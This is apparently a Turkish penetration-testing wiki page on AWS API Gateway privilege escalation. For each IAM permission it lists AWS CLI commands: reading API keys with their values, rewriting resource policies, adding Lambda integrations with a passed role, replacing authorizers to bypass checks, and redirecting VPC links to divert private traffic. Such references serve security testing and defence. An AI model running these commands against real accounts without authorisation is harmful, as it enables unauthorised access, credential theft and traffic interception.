AWS - Apigateway Privesc

Apigateway

Daha fazla bilgi için kontrol edin:

apigateway:POST

Bu izinle, yapılandırılmış API'lerin (bölge başına) API anahtarlarını oluşturabilirsiniz.

aws --region <region> apigateway create-api-key

Olası Etki: Bu teknikle yetki yükseltme yapamazsınız ancak hassas bilgilere erişim elde edebilirsiniz.

apigateway:GET

Bu izinle, yapılandırılan API'lerin (bölge başına) oluşturulan API anahtarlarını alabilirsiniz.

aws --region <region> apigateway get-api-keys
aws --region <region> apigateway get-api-key --api-key <key> --include-value

Olası Etki: Bu teknikle yetki yükseltme yapamazsınız ama hassas bilgilere erişim elde edebilirsiniz.

apigateway:UpdateRestApiPolicy, apigateway:PATCH

Bu izinlerle, bir API'nin kaynak politikasını değiştirerek kendinize erişim verme ve API geçidinin sahip olabileceği potansiyel erişimi kötüye kullanma (örneğin, savunmasız bir lambda'yı çağırma) imkanı vardır.

aws apigateway update-rest-api \
--rest-api-id api-id \
--patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"'

Olası Etki: Genellikle, bu teknikle doğrudan privesc yapamayacaksınız ama hassas bilgilere erişim elde edebilirsiniz.

apigateway:PutIntegration, apigateway:CreateDeployment, iam:PassRole

apigateway:PutIntegration, apigateway:CreateDeployment ve iam:PassRole izinlerine sahip bir saldırgan, IAM rolü eklenmiş bir Lambda fonksiyonu ile mevcut bir API Gateway REST API'sine yeni bir entegrasyon ekleyebilir. Saldırgan daha sonra Lambda fonksiyonunu tetikleyerek rastgele kod çalıştırabilir ve potansiyel olarak IAM rolü ile ilişkili kaynaklara erişim kazanabilir.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"
LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"

# Add a new integration to the API Gateway REST API
aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $LAMBDA_ROLE_ARN

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Olası Etki: Lambda fonksiyonunun IAM rolü ile ilişkili kaynaklara erişim.

apigateway:UpdateAuthorizer, apigateway:CreateDeployment

apigateway:UpdateAuthorizer ve apigateway:CreateDeployment izinlerine sahip bir saldırgan, mevcut bir API Gateway yetkilisini değiştirebilir ve güvenlik kontrollerini atlayabilir veya API istekleri yapıldığında rastgele kod çalıştırabilir.

API_ID="your-api-id"
AUTHORIZER_ID="your-authorizer-id"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"

# Update the API Gateway authorizer
aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Olası Etki: Güvenlik kontrollerinin atlanması, API kaynaklarına yetkisiz erişim.

apigateway:UpdateVpcLink

apigateway:UpdateVpcLink iznine sahip bir saldırgan, mevcut bir VPC Bağlantısını farklı bir Ağ Yük Dengeleyicisine yönlendirebilir, bu da özel API trafiğini yetkisiz veya kötü niyetli kaynaklara yönlendirebilir.

bashCopy codeVPC_LINK_ID="your-vpc-link-id"
NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188"

# Update the VPC Link
aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]"

Potansiyel Etki: Özel API kaynaklarına yetkisiz erişim, API trafiğinin kesilmesi veya kesintiye uğraması.